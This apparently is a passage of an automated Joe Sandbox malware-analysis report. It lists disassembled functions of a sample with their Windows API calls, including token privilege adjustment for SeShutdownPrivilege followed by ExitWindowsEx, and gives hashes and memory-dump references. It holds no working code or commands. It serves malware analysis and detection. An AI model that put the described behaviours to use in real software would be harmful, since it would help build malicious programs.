                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: E$P$P32@$c$e$i$o$r$s$s$t$x
                                                                                                                                                                                                                                                                                                • API String ID: 0-2269684116
                                                                                                                                                                                                                                                                                                • Opcode ID: 67708232c783caed01210743f30500afd73b8ffc04a3e19dad3ec982a8eb5999
                                                                                                                                                                                                                                                                                                • Instruction ID: 188e51f99b3aa9ddec7d557129ce05f34de3fbb78c9ae6bc7f213ff74b940b60
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 67708232c783caed01210743f30500afd73b8ffc04a3e19dad3ec982a8eb5999
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4A178A2D182549AF7208A24DC547FB6679EF94300F0881FED54D976C0E67F0FC58B2A
                                                                                                                                                                                                                                                                                                Function 00447441 Relevance: 15.2, Strings: 12, Instructions: 236COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                                                                                                                                                                                                                                                                                • API String ID: 0-4069139063
                                                                                                                                                                                                                                                                                                • Opcode ID: e57262210f101982aebc67fa1531e66537634e29451887fb22e68237d303f820
                                                                                                                                                                                                                                                                                                • Instruction ID: 39e3235dacd0361428d296b9665e6c4f4b05e32631fe48d7877cc75e529ec4ca
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e57262210f101982aebc67fa1531e66537634e29451887fb22e68237d303f820
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CAA1C3A1D082A88AF7208B25DC447EABBB5FF55300F1480FAD44DA7281E3794EC6CF56
                                                                                                                                                                                                                                                                                                Function 004476E7 Relevance: 15.2, Strings: 12, Instructions: 216COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                                                                                                                                                                                                                                                                                • API String ID: 0-4069139063
                                                                                                                                                                                                                                                                                                • Opcode ID: 8f512cef653570cbc9933f7ad1ee454ac54dce2b8e3aeade901f6980a8e4d110
                                                                                                                                                                                                                                                                                                • Instruction ID: e01e6551614943d30b2615baf5558eae676ad52589e069668acb98131b3f94d1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f512cef653570cbc9933f7ad1ee454ac54dce2b8e3aeade901f6980a8e4d110
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0091C3A1D082A88AF7208B25DC407DABBB5FF55304F1480EAD48DA7241E3794ED6CF56
                                                                                                                                                                                                                                                                                                Function 00419D90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,00421955), ref: 00419D9A
                                                                                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,00421955), ref: 00419DA1
                                                                                                                                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00419DB7
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00421955), ref: 00419DC6
                                                                                                                                                                                                                                                                                                • AdjustTokenPrivileges.ADVAPI32 ref: 00419E04
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00419E13
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00419E24
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseHandle$ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                                                                                                • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                                                                • API String ID: 1280518032-3733053543
                                                                                                                                                                                                                                                                                                • Opcode ID: da0e7d1861009587fb01dbe4e0b9d2093fea7a0ac8dcd4d1a170a0e53db07ebf
                                                                                                                                                                                                                                                                                                • Instruction ID: d07024e087d9fbb4da489035f39631b0ffcbbc48e9dced30be6a628d6d85d024
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: da0e7d1861009587fb01dbe4e0b9d2093fea7a0ac8dcd4d1a170a0e53db07ebf
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D91130B5208300ABD314DFA4DC89B5B77E4BB88B00F80882CF54DC6290E778D8C48B5A
                                                                                                                                                                                                                                                                                                Function 00461F10 Relevance: 12.8, APIs: 6, Strings: 1, Instructions: 598COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: $>
                                                                                                                                                                                                                                                                                                • API String ID: 0-4162622711
                                                                                                                                                                                                                                                                                                • Opcode ID: 92d9eede98623f53117d376c72bc09aac5265e67f7db331a73714669efe9eeb3
                                                                                                                                                                                                                                                                                                • Instruction ID: ab613082dd5abe8ce957bb114a2766d0e8ed38c9df93d9e2be8208bb24206897
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 92d9eede98623f53117d376c72bc09aac5265e67f7db331a73714669efe9eeb3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5432C1705087419BC339DF24C950BEBB7E5FF99300F04492EE99A872A0E7789945CB5B
                                                                                                                                                                                                                                                                                                Function 0041E0F0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49shutdownCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,00421972), ref: 0041E100
                                                                                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,00421972), ref: 0041E107
                                                                                                                                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0041E124
                                                                                                                                                                                                                                                                                                • AdjustTokenPrivileges.ADVAPI32 ref: 0041E148
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0041E14E
                                                                                                                                                                                                                                                                                                • ExitWindowsEx.USER32(00000001,80020003), ref: 0041E16E
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                                                                                                                                                • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                                                                • API String ID: 107509674-3733053543
                                                                                                                                                                                                                                                                                                • Opcode ID: b491cb2bc98087b98b93889b4cab252affd35304ae06bf2e3e34bcfb05d76a30
                                                                                                                                                                                                                                                                                                • Instruction ID: ff8bdaaac48f1339d689247c0ac3bb4d0c15d19762690cb1fcb66aa4c131ddab
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b491cb2bc98087b98b93889b4cab252affd35304ae06bf2e3e34bcfb05d76a30
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7301FC35644310BFE3109BA8DC49B9B7698BB44B04F40482DFD4DE6191D77499408BDA
                                                                                                                                                                                                                                                                                                Function 0045A7D0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 170fileCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?,?,?), ref: 0045A8C2
                                                                                                                                                                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 0045A915
                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?), ref: 0045A955
                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000,?,00000000,00000000,00000001,?,?,?), ref: 0045A9AA
                                                                                                                                                                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 0045A9CE
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: DiskFreeSpace$Find$CloseFileFirst
                                                                                                                                                                                                                                                                                                • String ID: %c:\
                                                                                                                                                                                                                                                                                                • API String ID: 281833627-3142399695
                                                                                                                                                                                                                                                                                                • Opcode ID: 451e843c757d912e0df44721ece3a0365b6d60f66d903087e08b2b682d24d5dc
                                                                                                                                                                                                                                                                                                • Instruction ID: 5c1349d2b4a299dbbed6192556f5b370b8187b703f81d55d5c722b9a40b8fb44
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 451e843c757d912e0df44721ece3a0365b6d60f66d903087e08b2b682d24d5dc
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A071FBB55057019FD314DF64D988BABB7E4FF98711F008A2EE89A87390E734A848CF56
                                                                                                                                                                                                                                                                                                Function 0041F8D0 Relevance: 9.1, APIs: 6, Instructions: 98windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • IsIconic.USER32(?), ref: 0041F916
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000027,?,00000000), ref: 0041F937
                                                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(0000000B), ref: 0041F945
                                                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(0000000C), ref: 0041F94B
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0041F958
                                                                                                                                                                                                                                                                                                • DrawIcon.USER32(?,?,?,?), ref: 0041F989
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MetricsSystem$ClientDrawIconIconicMessageRectSend
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2166663075-0
                                                                                                                                                                                                                                                                                                • Opcode ID: cb24d554b556fdc8d671f57bd367dd0002cc258e733202bd551999ba64437650
